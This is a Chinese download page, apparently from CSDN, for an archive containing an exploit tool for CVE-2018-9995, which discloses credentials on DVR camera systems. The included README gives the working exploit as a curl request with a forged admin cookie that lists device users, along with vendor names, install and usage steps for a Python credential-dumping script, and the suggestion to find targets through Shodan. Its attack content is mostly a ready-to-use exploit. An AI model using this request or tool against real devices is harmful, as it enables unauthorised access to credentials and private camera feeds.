CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burpCVE-2018-999资源-CSDN文库

共31个文件

png：26个

jpg：1个

license：1个

版权申诉

shodan

show

157 浏览量 2022-09-20 10:40:23 上传评论收藏 4.6MB RAR 举报

标题中的"CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999"提及了几个关键概念，CVE（Common Vulnerabilities and Exposures）是用于识别网络安全漏洞的标准化系统。"CVE-2018-9995"指的是2018年发现的一个特定漏洞。此漏洞可能影响到某些监控设备，使得攻击者能够利用它获取设备的凭证信息。"FXG"可能是受影响设备制造商或型号的缩写，但未提供足够的上下文来详细解释。"burp"是指Burp Suite，一个流行的网络安全测试工具，常用于web应用安全审计。描述中提到"[Tool] show DVR Credentials"，表明这个压缩包可能包含一个工具，用于展示通过CVE-2018-9995漏洞获取的数字视频录像机（DVR）的凭证信息。"Shodan"是一个网络搜索引擎，专门用于查找互联网上的各种联网设备，包括监控摄像头和其他物联网设备。这里提到"与Shodan配合食用更佳"，意味着可能可以先用Shodan找到目标设备，然后用这个工具来获取它们的凭证。标签中的"cve-2018"是对上述漏洞年份的简写，"fxg"和"burp_cve-2018-9995"再次提到了可能受影响的设备和利用漏洞的工具。"shodan"和"show"则分别对应描述中的搜索工具和展示凭证的功能。压缩包内的文件名列表提供了额外的信息： 1. "LICENSE"通常包含软件的许可协议，说明该工具的使用条件。 2. "README.md"通常会包含对项目的基本介绍、如何使用以及注意事项等。 3. "getDVR_Credentials.py"很可能是一个Python脚本，用于自动利用CVE-2018-9995漏洞获取DVR的凭证。 4. "requirements.txt"列出该Python脚本所需的外部库或模块，以便在运行前安装。 5. "screenshot"可能包含工具使用示例或结果展示的图片。这个压缩包提供的工具可能是一个安全研究人员或渗透测试人员用来检测和利用CVE-2018-9995漏洞的实用程序。用户可以使用它来发现和获取那些由于此漏洞而暴露的DVR设备的凭证，同时结合Shodan来扩大搜索范围。在实际操作中，这应当遵循道德黑客准则，并仅用于合法的安全评估，以保护网络安全。

资源推荐

资源详情

资源评论

收起资源包目录

CVE-2018-9995_dvr_credentials.rar （31个子文件）

screenshot

videoWall.jpg 92KB

loginFront

login_2.png 68KB

login_1.png 27KB

login_9.png 32KB

login_4.png 49KB

login_3.png 68KB

login_8.png 32KB

login_7.png 164KB

login_5.png 70KB

login_10.png 24KB

login_6.png 95KB

toolOutput

poc_3.png 19KB

poc_4.png 23KB

poc_2.png 12KB

poc_1.png 13KB

cow

shodan_1.png 71KB

shodan_2.png 187KB

google_1.png 70KB

indoor

in_5.png 508KB

in_3.png 358KB

in_x1.png 422KB

in_4.png 586KB

in_x.png 714KB

in_2.png 296KB

in_1.png 537KB

tbk_vision

indoor_1.png 219KB

login_1.png 42KB

getDVR_Credentials.py 4KB

LICENSE 35KB

requirements.txt 10B

README.md 3KB

# [Tool] show DVR Credentiales [*] Exploit Title: "Gets DVR Credentials" [*] CVE: CVE-2018-9995 [*] CVSS Base Score v3: 7.3 / 10 [*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N [*] Date: 09/04/2018 [*] Exploit Author: Fernandez Ezequiel ( twitter:@capitan_alfa ) ![DVR_wall](screenshot/videoWall.jpg) ### Exploit: ``` $> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" ``` ## tested in DVR (banner/vendor ?): Novo CeNova QSee Pulnix XVR 5 in 1 (title: "XVR Login") Securus, - Security. Never Compromise !! - Night OWL DVR Login HVR Login MDVR Login # On the Wild: ![DVR_dorks_2](screenshot/cow/shodan_1.png) ![DVR_dorks_1](screenshot/cow/google_1.png) ![DVR_dorks_3](screenshot/cow/shodan_2.png) ## Possible Banners frontend (web): ![DVR_login_1](screenshot/loginFront/login_1.png) ![DVR_login_2](screenshot/loginFront/login_2.png) ![DVR_login_3](screenshot/loginFront/login_3.png) ![DVR_login_4](screenshot/loginFront/login_4.png) ![DVR_login_5](screenshot/loginFront/login_5.png) ![DVR_login_6](screenshot/loginFront/login_6.png) ![DVR_login_7](screenshot/loginFront/login_7.png) ![DVR_login_8](screenshot/loginFront/login_9.png) ![DVR_login_10](screenshot/loginFront/login_10.png) ## Indoor: ![DVR_indoor_1](screenshot/indoor/in_x.png) ![DVR_indoor_2](screenshot/indoor/in_x1.png) ![DVR_indoor_3](screenshot/indoor/in_1.png) ![DVR_indoor_4](screenshot/indoor/in_2.png) ![DVR_indoor_5](screenshot/indoor/in_3.png) ![DVR_indoor_6](screenshot/indoor/in_4.png) ![DVR_indoor_7](screenshot/indoor/in_5.png) # TOOL: "Show all DVR Credentials" ## Quick start usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git usr@pwn:~$ cd CVE-2018-9995_dvr_credentials usr@pwn:~$ pip install -r requirements.txt ## help usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT] [+] Obtaining Exposed credentials optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit --host HOST Host --port PORT Port [+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81 ## Pocs (Output) : ![DVR_poc_4](screenshot/toolOutput/poc_4.png) ![DVR_poc_3](screenshot/toolOutput/poc_3.png) ![DVR_poc_2](screenshot/toolOutput/poc_2.png) ![DVR_poc_1](screenshot/toolOutput/poc_1.png) ### Blog: http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html I see you... ! xd

评论收藏

内容反馈

版权申诉